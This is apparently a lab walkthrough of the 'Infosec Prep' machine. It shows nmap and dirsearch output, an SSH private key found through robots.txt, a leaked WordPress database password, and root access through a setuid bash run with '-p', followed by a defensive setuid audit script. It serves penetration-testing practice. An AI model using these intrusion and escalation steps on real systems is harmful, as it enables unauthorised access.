Infosec Prep

Nmap 192.168.130.89

22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
|   256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOX6nl2HC2/Prh0l8uVsnAzinDT2+rhj1VasPM8Df3ntzgb8XzQat7zC/nHm0v7yLWo/CjpI6pD+mrBh3P/wuqk=
|   256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBefJyPm1sjN+QedhTj6S1CPbXQZEFXb58RICJh970R8
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher – Just another WordPress site
| http-robots.txt: 1 disallowed entry 
|_/secret.txt
|_http-generator: WordPress 5.4.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Secrets found

This was an SSH private key.

[18:45:23] 301 -    0B  - /index.php  ->  http://secprep/
[18:45:24] 301 -  307B  - /javascript  ->  http://secprep/javascript/
[18:45:24] 200 -   19KB - /license.txt
[18:45:31] 200 -    7KB - /readme.html
[18:45:32] 200 -   36B  - /robots.txt
[18:45:38] 301 -  305B  - /wp-admin  ->  http://secprep/wp-admin/
[18:45:38] 302 -    0B  - /wp-admin/  ->  http://192.168.130.89/wp-login.php?redirect_to=http%3A%2F%2Fsecprep%2Fwp-admin%2F&reauth=1
[18:45:38] 200 -    0B  - /wp-config.php
[18:45:39] 301 -  307B  - /wp-content  ->  http://secprep/wp-content/
[18:45:39] 200 -    1KB - /wp-admin/install.php
[18:45:39] 200 -    0B  - /wp-content/
[18:45:39] 200 -   69B  - /wp-content/plugins/akismet/akismet.php
[18:45:39] 301 -  308B  - /wp-includes  ->  http://secprep/wp-includes/
[18:45:39] 200 -    0B  - /wp-cron.php
[18:45:39] 200 -    5KB - /wp-login.php
[18:45:39] 302 -    0B  - /wp-signup.php  ->  http://192.168.130.89/wp-login.php?action=register
[18:45:39] 200 -   45KB - /wp-includes/
[18:45:39] 405 -   42B  - /xmlrpc.php
<rss version="2.0">
<channel>
<title> Comments for OSCP Voucher </title>
<atom:link href="http://192.168.130.89/index.php/comments/feed/" rel="self" type="application/rss+xml"/>
<link>http://192.168.130.89</link>
<description>Just another WordPress site</description>
<lastBuildDate>Thu, 09 Jul 2020 06:12:49 +0000</lastBuildDate>
<sy:updatePeriod> hourly </sy:updatePeriod>
<sy:updateFrequency> 1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=5.4.2</generator>
<item>
<title>
</title>
<link>
http://192.168.130.89/index.php/2020/07/09/hello-world/#comment-1
</link>
<dc:creator>A WordPress Commenter</dc:creator>
<pubDate>Thu, 09 Jul 2020 06:12:49 +0000</pubDate>
<guid isPermaLink="false">http://192.168.128.135/?p=1#comment-1</guid>
<description>
</description>
<content:encoded>
<p>Hi, this is a comment.<br /> To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.<br /> Commenter avatars come from <a href="https://gravatar.com">Gravatar</a>.</p>
</content:encoded>
</item>
</channel>
</rss>

 [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 5.4.9
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209
 |

Logged in over SSH with the private key (ssh -i id_rsa) as the oscp account.

Priv Esc

╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 root root 2381 Dec 27 2019 /usr/share/wordpress/wp-config.php
$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']);
if (!defined('DB_NAME')) define('DB_NAME', 'wordpress');
if (!defined('DB_USER')) define('DB_USER', 'wordpress');
if (!defined('DB_HOST')) define('DB_HOST', 'localhost');
-rw-r--r-- 1 root root 2897 Jul 9 2020 /var/www/html/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'Oscp12345!' );
define( 'DB_HOST', 'localhost' );

-rw------- 1 oscp oscp 2590 Jul  9  2020 /home/oscp/.ssh/id_rsa
-rw-r--r-- 1 oscp oscp 563 Jul  9  2020 /home/oscp/.ssh/id_rsa.pub

SUID

-rwsr-sr-x 1 root root 1.2M Feb 25 2020 /usr/bin/bash

I was running /bash and /usr/bin/bash

but all I had to do was run /bin/bash -p

/usr/bin/bash -p worked too
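As a defender-side check for the finding above, here is an audit helper (added here, not part of the original writeup) that lists setuid/setgid files and flags shells and interpreters such as a setuid /usr/bin/bash, which keeps its root effective UID when started with -p. The watch list of names and the use of GNU stat are assumptions.

```shell
#!/usr/bin/env bash
# Constructed audit helper (not from the original writeup): list setuid/setgid
# files and flag shells or interpreters. A setuid root bash keeps euid=0 when
# started with -p, so such a file is effectively a standing root shell.

# Basenames that should not carry a setuid/setgid bit on a hardened host
# (assumption: extend this list for your environment).
SUSPICIOUS_SETID_NAMES="bash sh dash zsh ksh python python3 perl ruby php find vim nano less more"

# find_setid_files DIR: print regular files under DIR with setuid or setgid set.
find_setid_files() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# is_suspicious_name PATH: exit 0 when the basename is in the watch list.
is_suspicious_name() {
  local base n
  base=$(basename "$1")
  for n in $SUSPICIOUS_SETID_NAMES; do
    [ "$base" = "$n" ] && return 0
  done
  return 1
}

# audit_setid DIR: one line per setid file, "ALERT <mode> <owner> <path>" for
# watch-list names and "info <mode> <owner> <path>" for everything else.
audit_setid() {
  local f mode owner
  find_setid_files "$1" | while IFS= read -r f; do
    mode=$(stat -c '%A' "$f")   # GNU stat (Linux), as on the Ubuntu target
    owner=$(stat -c '%U' "$f")
    if is_suspicious_name "$f"; then
      printf 'ALERT %s %s %s\n' "$mode" "$owner" "$f"
    else
      printf 'info %s %s %s\n' "$mode" "$owner" "$f"
    fi
  done
}

# count_alerts DIR: number of ALERT lines, e.g. for a cron job or a test.
count_alerts() {
  audit_setid "$1" | grep -c '^ALERT' || true
}
```

Run it as `audit_setid /` from a root shell to cover the whole system; on the box in this writeup the /usr/bin/bash entry would come back as an ALERT line.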
